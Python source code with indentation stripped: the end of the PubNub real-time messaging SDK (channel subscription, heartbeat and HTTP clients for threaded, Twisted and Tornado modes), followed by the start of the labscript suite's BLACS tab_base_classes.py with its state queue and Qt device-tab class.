if channel_groups is not None and len(channel_groups) > 0:
data['channel-group'] = channel_groups
if self.heartbeat > 0 and self.heartbeat < 320:
data['heartbeat'] = self.heartbeat
## Send Heartbeat
return self._request({"urlcomponents": [
'v2', 'presence', 'sub-key',
self.subscribe_key,
'channel',
channels,
'heartbeat'
], 'urlparams': data},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def subscribe(self, channels, callback, state=None, error=None,
connect=None, disconnect=None, reconnect=None,
presence=None, sync=False):
"""Subscribe to data on a channel.
This function causes the client to create an open TCP socket to the
PubNub Real-Time Network and begin listening for messages on a
specified channel. To subscribe to a channel the client must send
the appropriate subscribe_key at initialization.
Only works in async mode
Args:
channels: (string/list)
Specifies the channel to subscribe to. It is possible
to specify multiple channels as a comma separated list
or array.
callback: (function)
This callback is called on receiving a message from
the channel.
state: (dict)
State to be set.
error: (function) (optional)
This callback is called on an error event
connect: (function) (optional)
This callback is called on a successful connection to
the PubNub cloud
disconnect: (function) (optional)
This callback is called on client disconnect from the
PubNub cloud
reconnect: (function) (optional)
This callback is called on successfully re-connecting
to the PubNub cloud
Returns:
None
"""
return self._subscribe(
channels=channels, callback=callback, state=state, error=error,
connect=connect, disconnect=disconnect, reconnect=reconnect,
presence=presence)
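# Illustrative usage sketch (async only, per the docstring; channel name
# and handlers are placeholders). On the threaded Pubnub client start() is
# a no-op; on the Twisted/Tornado variants below it runs the event loop:
#
#   def on_message(message, channel):
#       print(channel, message)
#
#   pubnub.subscribe(channels='lobby', callback=on_message,
#                    error=lambda e: print('error:', e),
#                    connect=lambda ch: print('connected to', ch),
#                    disconnect=lambda ch: print('disconnected from', ch),
#                    reconnect=lambda ch: print('reconnected to', ch))
#   pubnub.start()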
def subscribe_group(self, channel_groups, callback, error=None,
connect=None, disconnect=None, reconnect=None,
sync=False):
"""Subscribe to data on a channel group.
This function causes the client to create an open TCP socket to the
PubNub Real-Time Network and begin listening for messages on a
specified channel. To subscribe to a channel group the client must
send the appropriate subscribe_key at initialization.
Only works in async mode
Args:
channel_groups: (string/list)
Specifies the channel groups to subscribe to. It is
possible to specify multiple channel groups as a comma
separated list or array.
callback: (function)
This callback is called on receiving a message from
the channel.
error: (function) (optional)
This callback is called on an error event
connect: (function) (optional)
This callback is called on a successful connection to
the PubNub cloud
disconnect: (function) (optional)
This callback is called on client disconnect from the
PubNub cloud
reconnect: (function) (optional)
This callback is called on successfully re-connecting
to the PubNub cloud
Returns:
None
"""
return self._subscribe(
channel_groups=channel_groups, callback=callback, error=error,
connect=connect, disconnect=disconnect, reconnect=reconnect)
def _subscribe(
self, channels=None, channel_groups=None, state=None, callback=None,
error=None, connect=None, disconnect=None, reconnect=None,
presence=None):
with self._tt_lock:
self.last_timetoken = self.timetoken if self.timetoken != 0 \
else self.last_timetoken
self.timetoken = 0
def _invoke(func, msg=None, channel=None, real_channel=None):
if func is not None:
if (msg is not None and channel is not None and
real_channel is not None):
try:
func(get_data_for_user(msg), channel, real_channel)
except TypeError:
func(get_data_for_user(msg), channel)
elif msg is not None and channel is not None:
func(get_data_for_user(msg), channel)
elif msg is not None:
func(get_data_for_user(msg))
else:
func()
def _invoke_connect():
if self._channel_list_lock:
with self._channel_list_lock:
x = copy.copy(self.subscriptions)
for ch in x:
chobj = x[ch]
if chobj['connected'] is False:
chobj['connected'] = True
chobj['disconnected'] = False
_invoke(chobj['connect'], chobj['name'])
else:
if chobj['disconnected'] is True:
chobj['disconnected'] = False
_invoke(chobj['reconnect'], chobj['name'])
if self._channel_group_list_lock:
with self._channel_group_list_lock:
for ch in self.subscription_groups:
chobj = self.subscription_groups[ch]
if chobj['connected'] is False:
chobj['connected'] = True
chobj['disconnected'] = False
_invoke(chobj['connect'], chobj['name'])
else:
if chobj['disconnected'] is True:
chobj['disconnected'] = False
_invoke(chobj['reconnect'], chobj['name'])
def _invoke_disconnect():
if self._channel_list_lock:
with self._channel_list_lock:
for ch in self.subscriptions:
chobj = self.subscriptions[ch]
if chobj['connected'] is True:
if chobj['disconnected'] is False:
chobj['disconnected'] = True
_invoke(chobj['disconnect'], chobj['name'])
if self._channel_group_list_lock:
with self._channel_group_list_lock:
for ch in self.subscription_groups:
chobj = self.subscription_groups[ch]
if chobj['connected'] is True:
if chobj['disconnected'] is False:
chobj['disconnected'] = True
_invoke(chobj['disconnect'], chobj['name'])
def _invoke_error(channel_list=None, error=None):
if channel_list is None:
for ch in self.subscriptions:
chobj = self.subscriptions[ch]
try:
_invoke(chobj['error'], error, ch)
except TypeError:
_invoke(chobj['error'], error)
else:
for ch in channel_list:
chobj = self.subscriptions[ch]
try:
_invoke(chobj['error'], error, ch)
except TypeError:
_invoke(chobj['error'], error)
def _get_channel():
for ch in self.subscriptions:
chobj = self.subscriptions[ch]
if chobj['subscribed'] is True:
return chobj
if channels is not None:
channels = channels if isinstance(
channels, list) else channels.split(",")
for channel in channels:
## New Channel?
if len(channel) > 0 and \
(not channel in self.subscriptions or
self.subscriptions[channel]['subscribed'] is False):
with self._channel_list_lock:
self.subscriptions[channel] = {
'name': channel,
'first': False,
'connected': False,
'disconnected': True,
'subscribed': True,
'callback': callback,
'connect': connect,
'disconnect': disconnect,
'reconnect': reconnect,
'error': error,
'presence': presence
}
if state is not None:
if channel in state:
self.STATE[channel] = state[channel]
else:
self.STATE[channel] = state
if channel_groups is not None:
channel_groups = channel_groups if isinstance(
channel_groups, list) else channel_groups.split(",")
for channel_group in channel_groups:
## New Channel?
if (len(channel_group) > 0 and
(not channel_group in self.subscription_groups or
self.subscription_groups[channel_group]['subscribed']
is False)):
with self._channel_group_list_lock:
self.subscription_groups[channel_group] = {
'name': channel_group,
'first': False,
'connected': False,
'disconnected': True,
'subscribed': True,
'callback': callback,
'connect': connect,
'disconnect': disconnect,
'reconnect': reconnect,
'error': error,
'presence': presence
}
'''
## return if already connected to channel
if channel in self.subscriptions and \
'connected' in self.subscriptions[channel] and \
self.subscriptions[channel]['connected'] is True:
_invoke(error, "Already Connected")
return
'''
self.restart_heartbeat()
## SUBSCRIPTION RECURSION
def _connect():
self._reset_offline()
def error_callback(response):
## ERROR ?
if not response or \
('message' in response and
response['message'] == 'Forbidden'):
_invoke_error(channel_list=response['payload'][
'channels'], error=response['message'])
self.timeout(1, _connect)
return
if 'message' in response:
_invoke_error(error=response['message'])
else:
_invoke_disconnect()
self.timetoken = 0
self.timeout(1, _connect)
def sub_callback(response):
## ERROR ?
if not response or \
('message' in response and
response['message'] == 'Forbidden'):
_invoke_error(channel_list=response['payload'][
'channels'], error=response['message'])
_connect()
return
_invoke_connect()
with self._tt_lock:
self.timetoken = \
self.last_timetoken if self.timetoken == 0 and \
self.last_timetoken != 0 else response[1]
if len(response) > 3:
channel_list = response[2].split(',')
channel_list_2 = response[3].split(',')
response_list = response[0]
for ch in enumerate(channel_list):
if (ch[1] in self.subscription_groups or
ch[1] in self.subscriptions):
try:
chobj = self.subscription_groups[ch[1]]
except KeyError:
chobj = self.subscriptions[ch[1]]
if ('-pnpres' in channel_list_2[ch[0]]):
cb = chobj['presence']
else:
cb = chobj['callback']
_invoke(cb,
self.decrypt(response_list[ch[0]]),
chobj['name'].split('-pnpres')[0],
channel_list_2[ch[0]].split
('-pnpres')[0])
elif len(response) > 2:
channel_list = response[2].split(',')
response_list = response[0]
for ch in enumerate(channel_list):
if ch[1] in self.subscriptions:
chobj = self.subscriptions[ch[1]]
_invoke(chobj['callback'],
self.decrypt(response_list[ch[0]]),
chobj['name'].split('-pnpres')[0])
else:
response_list = response[0]
chobj = _get_channel()
for r in response_list:
if chobj:
_invoke(chobj['callback'], self.decrypt(r),
chobj['name'].split('-pnpres')[0])
_connect()
channel_list = self.get_channel_list(self.subscriptions)
channel_group_list = self.get_channel_group_list(
self.subscription_groups)
if len(channel_list) <= 0 and len(channel_group_list) <= 0:
return
if len(channel_list) <= 0:
channel_list = ','
data = {"uuid": self.uuid, "auth": self.auth_key,
'pnsdk': self.pnsdk, 'channel-group': channel_group_list}
st = json.dumps(self.STATE)
if len(st) > 2:
data['state'] = quote(st, safe="")
if self.heartbeat > 0:
data["heartbeat"] = self.heartbeat
## CONNECT TO PUBNUB SUBSCRIBE SERVERS
#try:
self.SUB_RECEIVER = self._request({"urlcomponents": [
'subscribe',
self.subscribe_key,
channel_list,
'0',
str(self.timetoken)
], "urlparams": data},
sub_callback,
error_callback,
single=True, timeout=320)
'''
except Exception as e:
self.timeout(1, _connect)
return
'''
self._connect = _connect
## BEGIN SUBSCRIPTION (LISTEN FOR MESSAGES)
_connect()
def _reset_offline(self):
if self.SUB_RECEIVER is not None:
self.SUB_RECEIVER()
self.SUB_RECEIVER = None
def CONNECT(self):
self._reset_offline()
self._connect()
def unsubscribe(self, channel):
"""Unsubscribe from channel .
Only works in async mode
Args:
channel: Channel name ( string )
"""
if channel not in self.subscriptions:
return False
## DISCONNECT
with self._channel_list_lock:
if channel in self.subscriptions:
self.subscriptions[channel]['connected'] = 0
self.subscriptions[channel]['subscribed'] = False
self.subscriptions[channel]['timetoken'] = 0
self.subscriptions[channel]['first'] = False
self.leave_channel(channel=channel)
# remove channel from STATE
self.STATE.pop(channel, None)
self.CONNECT()
def unsubscribe_group(self, channel_group):
"""Unsubscribe from channel group.
Only works in async mode
Args:
channel_group: Channel group name ( string )
"""
if channel_group not in self.subscription_groups:
return False
## DISCONNECT
with self._channel_group_list_lock:
if channel_group in self.subscription_groups:
self.subscription_groups[channel_group]['connected'] = 0
self.subscription_groups[channel_group]['subscribed'] = False
self.subscription_groups[channel_group]['timetoken'] = 0
self.subscription_groups[channel_group]['first'] = False
self.leave_group(channel_group=channel_group)
self.CONNECT()
class PubnubCore(PubnubCoreAsync):
def __init__(
self,
publish_key,
subscribe_key,
secret_key=None,
cipher_key=None,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None,
_tt_lock=None,
_channel_list_lock=None,
_channel_group_list_lock=None
):
super(PubnubCore, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid,
_tt_lock=_tt_lock,
_channel_list_lock=_channel_list_lock,
_channel_group_list_lock=_channel_group_list_lock
)
self.subscriptions = {}
self.timetoken = 0
self.accept_encoding = 'gzip'
class Timer:
def __init__(self, timeout, func, daemon=False, *argv):
self.timeout = timeout
self.func = func
self.argv = argv
self.stop = False
self.thread = None
self.daemon = daemon
def cancel(self):
self.stop = True
self.func = None
def run(self):
time.sleep(self.timeout)
if self.func is not None:
if self.argv is None or len(self.argv) == 0:
self.func()
else:
self.func(*(self.argv))
def start(self):
self.thread = threading.Thread(target=self.run)
self.thread.daemon = self.daemon
self.thread.start()
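# Illustrative usage sketch (my_func is a placeholder; Pubnub.timeout below
# wraps Timer exactly like this and hands back the cancel handle):
#
#   t = Timer(2.5, my_func, False, 'arg')  # my_func('arg') after 2.5 s
#   t.start()                              # fires on a background thread
#   t.cancel()                             # suppresses the call if pending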
class HTTPClient:
def __init__(self, pubnub, url, urllib_func=None,
callback=None, error=None, id=None, timeout=5):
self.url = url
self.id = id
self.callback = callback
self.error = error
self.stop = False
self._urllib_func = urllib_func
self.timeout = timeout
self.pubnub = pubnub
def cancel(self):
self.stop = True
self.callback = None
self.error = None
def run(self):
def _invoke(func, data):
if func is not None:
func(get_data_for_user(data))
if self._urllib_func is None:
return
resp = self._urllib_func(self.url, timeout=self.timeout)
data = resp[0]
code = resp[1]
if self.stop is True:
return
if self.callback is None:
with self.pubnub.latest_sub_callback_lock:
if self.pubnub.latest_sub_callback['id'] != self.id:
return
else:
if (self.pubnub.latest_sub_callback['callback']
is not None):
self.pubnub.latest_sub_callback['id'] = 0
try:
data = json.loads(data)
except ValueError:
_invoke(self.pubnub.latest_sub_callback['error'],
{'error': 'json decoding error'})
return
if code != 200:
_invoke(self.pubnub.latest_sub_callback[
'error'], data)
else:
_invoke(self.pubnub.latest_sub_callback[
'callback'], data)
else:
try:
data = json.loads(data)
except ValueError:
_invoke(self.error, {'error': 'json decoding error'})
return
if code != 200:
_invoke(self.error, data)
else:
_invoke(self.callback, data)
def _urllib_request_2(url, timeout=5):
try:
resp = urllib2.urlopen(url, timeout=timeout)
except urllib2.HTTPError as http_error:
resp = http_error
except urllib2.URLError as error:
msg = {"message": str(error.reason)}
return (json.dumps(msg), 0)
return (resp.read(), resp.code)
class PubnubHTTPAdapter(HTTPAdapter):
def init_poolmanager(self, *args, **kwargs):
kwargs.setdefault('socket_options', default_socket_options)
super(PubnubHTTPAdapter, self).init_poolmanager(*args, **kwargs)
s = requests.Session()
#s.mount('http://', PubnubHTTPAdapter(max_retries=1))
#s.mount('https://', PubnubHTTPAdapter(max_retries=1))
#s.mount('http://pubsub.pubnub.com', HTTPAdapter(max_retries=1))
#s.mount('https://pubsub.pubnub.com', HTTPAdapter(max_retries=1))
def _requests_request(url, timeout=5):
try:
resp = s.get(url, timeout=timeout)
except requests.exceptions.HTTPError as http_error:
resp = http_error
except requests.exceptions.ConnectionError as error:
msg = str(error)
return (json.dumps(msg), 0)
except requests.exceptions.Timeout as error:
msg = str(error)
return (json.dumps(msg), 0)
return (resp.text, resp.status_code)
def _urllib_request_3(url, timeout=5):
try:
resp = urllib.request.urlopen(url, timeout=timeout)
except (urllib.request.HTTPError, urllib.request.URLError) as http_error:
resp = http_error
r = resp.read().decode("utf-8")
return (r, resp.code)
_urllib_request = None
# Pubnub
class Pubnub(PubnubCore):
def __init__(
self,
publish_key,
subscribe_key,
secret_key=None,
cipher_key=None,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None,
pooling=True,
daemon=False,
pres_uuid=None,
azure=False
):
super(Pubnub, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid or pres_uuid,
_tt_lock=threading.RLock(),
_channel_list_lock=threading.RLock(),
_channel_group_list_lock=threading.RLock()
)
global _urllib_request
if self.python_version == 2:
_urllib_request = _urllib_request_2
else:
_urllib_request = _urllib_request_3
if pooling is True:
_urllib_request = _requests_request
self.latest_sub_callback_lock = threading.RLock()
self.latest_sub_callback = {'id': None, 'callback': None}
self.pnsdk = 'PubNub-Python' + '/' + self.version
self.daemon = daemon
if azure is False:
s.mount('http://pubsub.pubnub.com', HTTPAdapter(max_retries=1))
s.mount('https://pubsub.pubnub.com', HTTPAdapter(max_retries=1))
else:
s.mount('http://', PubnubHTTPAdapter(max_retries=1))
s.mount('https://', PubnubHTTPAdapter(max_retries=1))
def timeout(self, interval, func1, *argv):
timer = Timer(interval, func1, False, *argv)
timer.start()
return timer.cancel
def _request_async(self, url, callback=None, error=None, single=False,
timeout=5):
global _urllib_request
if single is True:
id = time.time()
client = HTTPClient(self, url=url, urllib_func=_urllib_request,
callback=None, error=None, id=id,
timeout=timeout)
with self.latest_sub_callback_lock:
self.latest_sub_callback['id'] = id
self.latest_sub_callback['callback'] = callback
self.latest_sub_callback['error'] = error
else:
client = HTTPClient(self, url=url, urllib_func=_urllib_request,
callback=callback, error=error,
timeout=timeout)
thread = threading.Thread(target=client.run)
thread.daemon = self.daemon
thread.start()
def abort():
client.cancel()
return abort
def _request_sync(self, url, timeout=5):
global _urllib_request
## Send Request Expecting JSONP Response
response = _urllib_request(url, timeout=timeout)
try:
resp_json = json.loads(response[0])
except ValueError:
return [0, "JSON Error"]
if (response[1] != 200 and 'message' in resp_json and
'payload' in resp_json):
return {'message': resp_json['message'],
'payload': resp_json['payload']}
if response[1] == 0:
return [0, resp_json]
return resp_json
def _request(self, request, callback=None, error=None, single=False,
timeout=5, encoder_map=None):
url = self.getUrl(request, encoder_map)
if callback is None:
return get_data_for_user(self._request_sync(url,
timeout=timeout))
else:
return self._request_async(url, callback, error,
single=single, timeout=timeout)
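# Dispatch sketch (illustration; reuses the public time endpoint seen
# earlier):
#
#   pubnub._request({'urlcomponents': ['time', '0']})
#   # -> parsed JSON, blocking (sync path, no callback)
#   abort = pubnub._request({'urlcomponents': ['time', '0']},
#                           callback=print, error=print)
#   abort()  # async path: cancels delivery of callback/error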
# Pubnub Twisted
class PubnubTwisted(PubnubCoreAsync):
def start(self):
reactor.run()
def stop(self):
reactor.stop()
def timeout(self, delay, callback, *args):
def cb():
if callback is not None:
callback(*args)
timeout = reactor.callLater(delay, cb)
def cancel():
if timeout.active():
timeout.cancel()
return cancel
def __init__(
self,
publish_key,
subscribe_key,
secret_key=None,
cipher_key=None,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None
):
super(PubnubTwisted, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid
)
self.headers = {}
self.headers['User-Agent'] = ['Python-Twisted']
self.headers['V'] = [self.version]
self.pnsdk = 'PubNub-Python-' + 'Twisted' + '/' + self.version
def _request(self, request, callback=None, error=None,
single=False, timeout=5, encoder_map=None):
global pnconn_pool
def _invoke(func, data):
if func is not None:
func(get_data_for_user(data))
## Build URL
url = self.getUrl(request, encoder_map)
agent = ContentDecoderAgent(RedirectAgent(Agent(
reactor,
contextFactory=WebClientContextFactory(),
pool=self.ssl and None or pnconn_pool
)), [('gzip', GzipDecoder)])
try:
request = agent.request(
'GET', url, Headers(self.headers), None)
except TypeError:
request = agent.request(
'GET', url.encode(), Headers(self.headers), None)
if single is True:
id = time.time()
self.id = id
def received(response):
if not isinstance(response, twisted.web._newclient.Response):
_invoke(error, {"message": "Not Found"})
return
finished = Deferred()
if response.code in [401, 403]:
response.deliverBody(PubNubPamResponse(finished))
else:
response.deliverBody(PubNubResponse(finished))
return finished
def complete(data):
if single is True:
if id != self.id:
return None
try:
data = json.loads(data)
except ValueError:
try:
data = json.loads(data.decode("utf-8"))
except ValueError:
_invoke(error, {'error': 'json decode error'})
if 'error' in data and 'status' in data and data['status'] != 200:
_invoke(error, data)
else:
_invoke(callback, data)
def abort():
pass
request.addCallback(received)
request.addCallback(complete)
return abort
# PubnubTornado
class PubnubTornado(PubnubCoreAsync):
def stop(self):
ioloop.stop()
def start(self):
ioloop.start()
def timeout(self, delay, callback, *args):
handle = None
def cancel():
ioloop.remove_timeout(handle)
def cb():
if callback is not None:
callback(*args)
handle = ioloop.add_timeout(time.time() + float(delay), cb)
return cancel
def __init__(
self,
publish_key,
subscribe_key,
secret_key=False,
cipher_key=False,
auth_key=False,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None
):
super(PubnubTornado, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid
)
self.headers = {}
self.headers['User-Agent'] = 'Python-Tornado'
self.headers['Accept-Encoding'] = self.accept_encoding
self.headers['V'] = self.version
self.http = tornado.httpclient.AsyncHTTPClient(max_clients=1000)
self.id = None
self.pnsdk = 'PubNub-Python-' + 'Tornado' + '/' + self.version
def _request(self, request, callback=None, error=None,
single=False, timeout=5, connect_timeout=5, encoder_map=None):
def _invoke(func, data):
if func is not None:
func(get_data_for_user(data))
url = self.getUrl(request, encoder_map)
request = tornado.httpclient.HTTPRequest(
url, 'GET',
self.headers,
connect_timeout=connect_timeout,
request_timeout=timeout)
if single is True:
id = time.time()
self.id = id
def responseCallback(response):
if single is True:
if not id == self.id:
return None
body = response._get_body()
if body is None:
return
def handle_exc(*args):
return True
if response.error is not None:
with ExceptionStackContext(handle_exc):
if response.code in [403, 401]:
response.rethrow()
else:
_invoke(error, {"message": response.reason})
return
try:
data = json.loads(body)
except TypeError:
try:
data = json.loads(body.decode("utf-8"))
except ValueError:
_invoke(error, {'error': 'json decode error'})
if 'error' in data and 'status' in data and data['status'] != 200:
_invoke(error, data)
else:
_invoke(callback, data)
self.http.fetch(
request=request,
callback=responseCallback
)
def abort():
pass
return abort
|
tab_base_classes.py | #####################################################################
# #
# /tab_base_classes.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from zprocess import Process
from Queue import Queue as Queue
import time
import sys
import threading
import cPickle
import traceback
import logging
import cgi
import os
from types import GeneratorType
import zprocess
#import labscript_utils.excepthook
if 'PySide' in sys.modules.copy():
from PySide.QtCore import *
from PySide.QtGui import *
else:
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qtutils import *
class Counter(object):
"""A class with a single method that
returns a different integer each time it's called."""
def __init__(self):
self.i = 0
def get(self):
self.i += 1
return self.i
MODE_MANUAL = 1
MODE_TRANSITION_TO_BUFFERED = 2
MODE_TRANSITION_TO_MANUAL = 4
MODE_BUFFERED = 8
class StateQueue(object):
# NOTE:
#
# It is theoretically possible to remove the dependency on the Qt Mainloop (remove inmain decorators and function calls)
# by introducing a local lock object instead. However, be aware that right now, the Qt inmain lock is preventing the
# statemachine loop (Tab.mainloop) from getting any states out of the queue until after the entire tab is initialised
# and the Qt mainloop starts.
#
# This is particularly important because we exploit this behaviour to make sure that Tab._initialise_worker is placed at the
# start of the StateQueue, and so the Tab.mainloop method is guaranteed to get this initialisation method as the first state
# regardless of whether the mainloop is started before the state is inserted (the state should always be inserted as part of
# the call to Tab.create_worker, in DeviceTab.initialise_workers in DeviceTab.__init__ )
#
def __init__(self,device_name):
self.logger = logging.getLogger('BLACS.%s.state_queue'%(device_name))
self.logging_enabled = False
if self.logging_enabled:
self.logger.debug("started")
self.list_of_states = []
self._last_requested_state = None
# A queue that blocks the get(requested_state) method until an entry in the queue has a state that matches the requested_state
self.get_blocking_queue = Queue()
@property
@inmain_decorator(True)
# This is always done in main so that we avoid a race condition between the get method and
# the put method accessing this property
def last_requested_state(self):
return self._last_requested_state
@last_requested_state.setter
@inmain_decorator(True)
def last_requested_state(self, value):
self._last_requested_state = value
def log_current_states(self):
if self.logging_enabled:
self.logger.debug('Current items in the state queue: %s'%str(self.list_of_states))
# this should only happen in the main thread, as my implementation is not thread safe!
@inmain_decorator(True)
def put(self,allowed_states,queue_state_indefinitely,delete_stale_states,data,prepend=False):
if prepend:
self.list_of_states.insert(0,[allowed_states,queue_state_indefinitely,delete_stale_states,data])
else:
self.list_of_states.append([allowed_states,queue_state_indefinitely,delete_stale_states,data])
# if this state is one the get command is waiting for, notify it!
if self.last_requested_state is not None and allowed_states&self.last_requested_state:
self.get_blocking_queue.put('new item')
if self.logging_enabled:
if not isinstance(data[0],str):
self.logger.debug('New state queued up. Allowed modes: %d, queue state indefinitely: %s, delete stale states: %s, function: %s'%(allowed_states,str(queue_state_indefinitely),str(delete_stale_states),data[0].__name__))
self.log_current_states()
# this should only happen in the main thread, as my implementation is not thread safe!
@inmain_decorator(True)
def check_for_next_item(self,state):
# We reset the queue here, as we are about to traverse the tree, which contains any new items that
# are described in messages in this queue, so let's not keep those messages around anymore.
# Put another way, we want to block until a new item is added, if we don't find an item in this function
# So it's best if the queue is empty now!
if self.logging_enabled:
self.logger.debug('Re-initialising self.get_blocking_queue')
self.get_blocking_queue = Queue()
# traverse the list
delete_index_list = []
success = False
for i,item in enumerate(self.list_of_states):
allowed_states,queue_state_indefinitely,delete_stale_states,data = item
if self.logging_enabled:
self.logger.debug('iterating over states in queue')
if allowed_states&state:
# We have found one! Remove it from the list
delete_index_list.append(i)
if self.logging_enabled:
self.logger.debug('requested state found in queue')
# If we are to delete stale states, see if the next state is the same statefunction.
# If it is, use that one, or whichever is the latest entry without encountering a different statefunction,
# and delete the rest
if delete_stale_states:
state_function = data[0]
i+=1
while i < len(self.list_of_states) and state_function == self.list_of_states[i][3][0]:
if self.logging_enabled:
self.logger.debug('requesting deletion of stale state')
allowed_states,queue_state_indefinitely,delete_stale_states,data = self.list_of_states[i]
delete_index_list.append(i)
i+=1
success = True
break
elif not queue_state_indefinitely:
if self.logging_enabled:
self.logger.debug('state should not be queued indefinitely')
delete_index_list.append(i)
# do this in reverse order so that the first delete operation doesn't mess up the indices of subsequent ones
for index in reversed(sorted(delete_index_list)):
if self.logging_enabled:
self.logger.debug('deleting state')
del self.list_of_states[index]
if not success:
data = None
return success,data
# this method should not be called in the main thread, because it will block until something is found...
# Please, only have one thread ever accessing this...I have no idea how it will behave if multiple threads are trying to get
# items from the queue...
#
# This method will block until an item in the queue is found that is allowed during the specified 'state'.
def get(self,state):
if self.last_requested_state:
raise Exception('You have multiple threads trying to get from this queue at the same time. I won\'t allow it!')
self.last_requested_state = state
while True:
if self.logging_enabled:
self.logger.debug('requesting next item in queue with mode %d'%state)
inmain(self.log_current_states)
status,data = self.check_for_next_item(state)
if not status:
# we didn't find anything useful, so we'll wait until a useful state is added!
self.get_blocking_queue.get()
else:
self.last_requested_state = None
return data
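# Semantics sketch (illustration; some_func is a placeholder and a running
# Qt mainloop is required, per the NOTE above): the GUI thread put()s state
# functions, the tab mainloop get()s them, filtered by the current mode.
#
#   q = StateQueue('my_device')
#   q.put(MODE_MANUAL | MODE_BUFFERED, True, False, [some_func, [(), {}]])
#   q.get(MODE_MANUAL)  # blocks until a matching item exists, then
#                       # returns [some_func, [(), {}]]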
# Make this function available globally:
get_unique_id = Counter().get
def define_state(allowed_modes,queue_state_indefinitely,delete_stale_states=False):
def wrap(function):
unescaped_name = function.__name__
escapedname = '_' + function.__name__
if allowed_modes < 1 or allowed_modes > 15:
raise RuntimeError('Function %s has been set to run in unknown states. Please make sure allowed states is one or more of MODE_MANUAL,'%unescaped_name+
'MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL and MODE_BUFFERED (or-ed together using the | symbol, eg MODE_MANUAL|MODE_BUFFERED)')
def f(self,*args,**kwargs):
function.__name__ = escapedname
#setattr(self,escapedname,function)
self.event_queue.put(allowed_modes,queue_state_indefinitely,delete_stale_states,[function,[args,kwargs]])
f.__name__ = unescaped_name
f._allowed_modes = allowed_modes
return f
return wrap
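# Usage sketch (mirrors how Tab subclasses use the decorator; MyTab and
# do_thing are placeholders):
#
#   class MyTab(Tab):
#       @define_state(MODE_MANUAL, queue_state_indefinitely=True)
#       def do_thing(self, value):
#           # queued on self.event_queue and executed by the tab mainloop;
#           # yield hands work to a worker process, as in
#           # Tab._initialise_worker below
#           yield(self.queue_work('main_worker', 'do_thing', value))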
class Tab(object):
def __init__(self,notebook,settings,restart=False):
# Store important parameters
self.notebook = notebook
self.settings = settings
self._device_name = self.settings["device_name"]
# Setup logging
self.logger = logging.getLogger('BLACS.%s'%(self.device_name))
self.logger.debug('Started')
# Setup the timer for updating that tab text label when the tab is not
# actively part of a notebook
self._tab_text_timer = QTimer()
self._tab_text_timer.timeout.connect(self.update_tab_text_colour)
self._tab_text_colour = 'black'
# Create instance variables
self._not_responding_error_message = ''
self._error = ''
self._state = ''
self._time_of_last_state_change = time.time()
self.not_responding_for = 0
self.hide_not_responding_error_until = 0
self._timeouts = set()
self._timeout_ids = {}
self._force_full_buffered_reprogram = True
self.event_queue = StateQueue(self.device_name)
self.workers = {}
self._supports_smart_programming = False
self._restart_receiver = []
# Load the UI
self._ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)),'tab_frame.ui'))
self._layout = self._ui.device_layout
self._device_widget = self._ui.device_controls
self._changed_widget = self._ui.changed_widget
self._changed_layout = self._ui.changed_layout
self._changed_widget.hide()
self.BLACS_connection = self.settings['connection_table'].find_by_name(self.device_name).BLACS_connection
self._ui.device_name.setText("<b>%s</b> <br />Connection: %s"%(str(self.device_name),str(self.BLACS_connection)))
# connect signals
self._ui.smart_programming.toggled.connect(self.on_force_full_buffered_reprogram)
self._ui.smart_programming.setEnabled(False)
self.force_full_buffered_reprogram = True
self._ui.button_close.clicked.connect(self.hide_error)
self._ui.button_restart.clicked.connect(self.restart)
self._update_error()
self.supports_smart_programming(False)
# This should be done before the main_loop starts or else there is a race condition as to whether the
# self._mode variable is even defined!
# However it must be done after the UI is created!
self.mode = MODE_MANUAL
self.state = 'idle'
# Setup the not responding timeout
self._timeout = QTimer()
self._timeout.timeout.connect(self.check_time)
self._timeout.start(1000)
# Launch the mainloop
self._mainloop_thread = threading.Thread(target = self.mainloop)
self._mainloop_thread.daemon = True
self._mainloop_thread.start()
# Add the tab to the notebook
self.notebook.addTab(self._ui,self.device_name)
self._ui.show()
def supports_smart_programming(self,support):
self._supports_smart_programming = bool(support)
if self._supports_smart_programming:
self._ui.smart_programming.show()
else:
self._ui.smart_programming.hide()
def on_force_full_buffered_reprogram(self,toggled):
self.force_full_buffered_reprogram = toggled
@property
def force_full_buffered_reprogram(self):
return self._force_full_buffered_reprogram
@force_full_buffered_reprogram.setter
def force_full_buffered_reprogram(self,value):
self._force_full_buffered_reprogram = bool(value)
self._ui.smart_programming.setChecked(bool(value))
@property
@inmain_decorator(True)
def error_message(self):
return self._error
@error_message.setter
@inmain_decorator(True)
def error_message(self,message):
#print message
#print self._error
if message != self._error:
self._error = message
self._update_error()
@inmain_decorator(True)
def _update_error(self):
prefix = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:"MS Shell Dlg 2"; font-size:7.8pt; font-weight:400; font-style:normal;">'
suffix = '</body></html>'
#print threading.current_thread().name
self._ui.error_message.setHtml(prefix+self._not_responding_error_message+self._error+suffix)
if self._error or self._not_responding_error_message:
self._ui.notresponding.show()
self._tab_text_colour = 'red'
